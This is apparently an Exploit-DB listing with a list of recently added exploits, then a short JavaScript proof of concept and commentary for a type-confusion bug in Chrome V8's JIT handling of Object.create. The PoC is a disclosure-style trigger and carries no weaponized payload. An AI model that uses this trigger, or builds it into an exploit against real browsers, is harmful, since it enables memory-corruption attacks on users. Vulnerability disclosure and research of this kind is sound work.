9897272892
8 changes to exploits/shellcodes Memcached - 'memcrashed' Denial of Service Softros Network Time System Server 2.3.4 - Denial of Service Chrome V8 JIT - Simplified-lowererer IrOpcode::kStoreField_ IrOpcode::kStoreElement Optimization Bug Chrome V8 JIT - JSBuiltinReducer::ReduceObjectCreate Fails to Ensure that the Prototype is _null_ Chrome V8 JIT - 'GetSpecializationContext' Type Confusion Chrome V8 JIT - Empty BytecodeJumpTable Out-of-Bounds Read Tenda AC15 Router - Unauthenticated Remote Code Execution Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC) Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download (PoC) Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download Bravo Tejari Web Portal - Cross-Site Request Forgery
31 lines
No EOL
870 B
JavaScript
31 lines
No EOL
870 B
JavaScript
/*
|
|
I think this commit has introduced the bug.
|
|
https://chromium.googlesource.com/v8/v8/+/ff7063c7d5d8ad8eafcce3da59e65d7fe2b4f915%5E%21/#F2
|
|
|
|
According to the description, Object.create is supposed to be inlined only when the prototype given as the parameter is "null".
|
|
|
|
The following check has to guarantee it, but it can't guarantee it. Any receiver can get through the check, then Map::GetObjectCreateMap may transition the prototype, which may lead to type confusion.
|
|
if (!prototype_const->IsNull(isolate()) && !prototype_const->IsJSReceiver()) {
|
|
return NoChange();
|
|
}
|
|
instance_map = Map::GetObjectCreateMap(prototype_const);
|
|
|
|
PoC:
|
|
*/
|
|
|
|
var object;
|
|
function opt() {
|
|
opt['x'] = 1.1;
|
|
try {
|
|
Object.create(object);
|
|
} catch (e) {
|
|
}
|
|
|
|
for (let i = 0; i < 1000000; i++) {
|
|
|
|
}
|
|
}
|
|
|
|
opt();
|
|
object = opt;
|
|
opt(); |